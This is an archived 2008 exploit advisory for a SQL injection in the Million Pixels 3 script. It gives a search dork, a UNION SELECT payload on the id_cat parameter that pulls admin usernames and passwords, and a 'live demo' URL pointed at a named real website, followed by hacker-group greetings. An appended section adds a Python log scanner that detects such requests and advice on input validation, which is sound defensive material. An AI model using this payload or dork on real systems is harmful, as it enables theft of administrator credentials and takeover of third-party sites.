millionpixels-sql.txt

2008-07-11T00:00:00
ID PACKETSTORM:68116
Type packetstorm
Reporter Hussin X
Modified 2008-07-11T00:00:00

Description

                                        
`#################################################################
#  
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability  
#  
#========================================================  
# =  
# Author: Hussin X =  
# =  
# Home : www.tryag.cc/cc  
# =  
# email: darkangel_g85[at]Yahoo[DoT]com =  
# =  
# =  
#========================================================  
#   
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php  
#  
# DorK : inurl: "tops_top.php? id_cat ="   
#################################################################  
  
Exploit:   
  
  
www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*  
  
  
  
  
L!VE DEMO:  
  
  
http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*  
  
  
  
  
########################( Greetz )###########################  
# #  
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #  
# #   
# Iraqihack / FAHD / mos_chori / Silic0n #  
# #  
#############################################################  
  
I'm IRAQi
`
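
For defenders checking web server logs for this issue, the following added example (not part of the original advisory) flags requests to tops_top.php whose id_cat value is not a plain integer, including URL-encoded and mixed-case forms of the comment-separated UNION SELECT pattern shown above. It assumes id_cat is meant to be a numeric category id and that logs use the combined log format; the sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; the client addresses are documentation IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2008:10:00:01 +0000] "GET /Script/tops_top.php?id_cat=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Jul/2008:10:00:07 +0000] "GET /Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,2/* HTTP/1.1" 200 873',
    '192.0.2.44 - - [11/Jul/2008:10:00:09 +0000] "GET /Script/tops_top.php?id_cat=-5%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT%2F%2A%2A%2F1%2C2 HTTP/1.1" 200 873',
    '192.0.2.10 - - [11/Jul/2008:10:00:12 +0000] "GET /Script/index.php?id_cat=abc HTTP/1.1" 200 2048',
    '192.0.2.51 - - [11/Jul/2008:10:00:15 +0000] "GET /Script/tops_top.php?id_cat=7%27 HTTP/1.1" 500 310',
]

# Request line inside a combined-format log entry: method, target, protocol.
REQUEST = re.compile(r'"(GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return None for a plain category id, else a short reason string."""
    # Assumption: a legitimate id_cat is a short non-negative integer.
    if re.fullmatch(r"\d{1,10}", value):
        return None
    # Inline /**/ comments stand in for spaces; flatten them before matching.
    flat = re.sub(r"/\*.*?\*/", " ", value)
    if re.search(r"\bunion\b.*\bselect\b", flat, re.I | re.S):
        return "union-select"
    return "non-numeric"


def scan(lines, script="tops_top.php", param="id_cat"):
    """Return (client, reason, decoded value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so encoded variants are normalised here.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                findings.append((line.split()[0], reason, value))
    return findings


if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same integer check belongs in the application itself: casting or validating id_cat before it reaches the query, together with a parameterized statement, removes the injection point rather than only detecting its use.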